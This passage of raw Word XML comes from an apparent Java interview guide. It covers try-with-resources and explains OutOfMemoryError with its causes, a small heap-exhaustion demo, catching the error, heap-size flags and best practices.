    <w:p w14:paraId="2C352059"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leReader fr = new FileReader("input.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26D066"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BufferedReader br = new BufferedReader(fr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25159945"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5B918"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br.readLine());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA9D12"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A287CBA" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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ADF5BC">
          <v:rect id="_x0000_i1650" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45C676" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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24"/>
        <w:gridCol w:w="1368"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="6F7B817D" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25DB5D02" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A5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6B8BDBC8" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A5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9C7A57" w:rsidRPr="00CE4B95" w14:paraId="1447D564" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70237FBC"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roduced in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CE83BB8"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 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="0F67ECFD" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D2251D"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requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E67D75"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utoCloseable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="3C719F5D" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20FB6693"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oses resources automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679AE5E0"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r>
      <w:tr w:rsidR="009C7A57" w:rsidRPr="00CE4B95" w14:paraId="264A6944" w14:textId="77777777" w:rsidTr="00BC2ECB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DFB7638"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duces need for finally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F32E77" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A5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r>
    </w:tbl>
    <w:p w14:paraId="03EDD5D8" w14:textId="520F5441" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="40ECA8AA">
          <v:rect id="_x0000_i1651" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D92FA" w14:textId="77777777" w:rsidR="00B81EA8" w:rsidRPr="00CE4B95" w:rsidRDefault="00B81EA8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc196307689"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you come across the OutOfMemory exception? How will you handle it? Explain with standalone code?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="19D5F271" w14:textId="4D9F7E3A" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">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es! The OutOfMemoryError is a common </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java when your application tries to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more memory than the JVM has allocated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., heap, metaspace, stack, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2AACC" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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A00497">
          <v:rect id="_x0000_i1652" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1F3478" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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at is OutOfMemoryError?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CA9B4"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s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subclass of Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not Exception, meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E770427" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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indicates a serious issue the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>should not try to catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E73AFC" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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typically means the JVM is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out of heap or other memory spaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCEC843" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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ADCCA95">
          <v:rect id="_x0000_i1653" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE58FB3" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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mmon Causes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6AC4D" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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reating large objects (e.g., huge arrays or collections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD03DA" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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emory leaks (unreleased objects held by references)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19A207" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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nbounded caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569CC98" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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oo many threads (stack space exhaustion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DACC59" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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etaspace (loading too many classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE1FBE" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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35472AB">
          <v:rect id="_x0000_i1654" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E747258" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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Triggering OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04538E43"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import java.util.ArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14855039"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596350CE" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521FCE38"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OOMExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29371CF3"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425E719D"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int[]&gt; memoryEater = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C397DFC"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3003F"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emoryEater.add(new int[1_000_000]); // Allocate ~4MB each time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D203D"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5DABC92"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38102FC"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75C3E23"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This will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eventually throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C88E39"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ception in thread "main" java.lang.OutOfMemoryError: Java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104DB73" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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9C00156">
          <v:rect id="_x0000_i1655" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263B434" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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How to Handle or Mitigate It?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604F82C" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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1. Catch It (Not Recommended for Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B17C2F"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y {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF60CDC"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int[]&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50584271"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9BFD1"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new int[1_000_000]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C409BCD"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5A5F060"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catch (OutOfMemoryError e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0351BE"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err.println("OutOfMemoryError caught: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63A8B6"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Log or send alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C1AEC"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0B18A2E"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This is useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>graceful shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or logging but not to continue normal execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260ED443" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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5FFF36C">
          <v:rect id="_x0000_i1656" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1E81B" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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JVM Tuning to Prevent It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58621E83"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can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tune the heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using VM options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739651A"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 -Xms128m -Xmx256m OOMExample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8644B" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Xms: Initial heap size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C86E3" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Xmx: Maximum heap size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF6CD6" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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72A2C08">
          <v:rect id="_x0000_i1657" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF1453" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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Best Practices to Avoid OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB9209" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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proper data structures (avoid large lists/arrays without bounds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E53F7" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WeakReference</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SoftReference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F7E567" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Monitor memory with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VisualVM</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jconsole</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MAT (Memory Analyzer Tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F285C84" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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void unnecessary object retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71DAFE" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ean up unused references and close resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB0E1A" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA6853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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try-with-resources for stream/DB objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088CE65" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AA68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7E818C7">
          <v:rect id="_x0000_i1658" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62AF18" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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6"/>
        <w:gridCol w:w="4193"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="6366A47F" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E3DA40" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4738A6DF" w14:textId="77777777" w:rsidR="00515BD7" w:rsidRPr="00CE4B95" w:rsidRDefault="00515BD7" w:rsidP="00AA685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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="2B6D66A2" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C17872"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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6036A539"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rror (not Exception)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="1C80B591" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F07100C"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use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CFF62DD"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emory exhaustion (Heap, Metaspace, Stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA6853" w:rsidRPr="00CE4B95" w14:paraId="5F394622" w14:textId="77777777" w:rsidTr="00515BD7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C24A21"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covery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
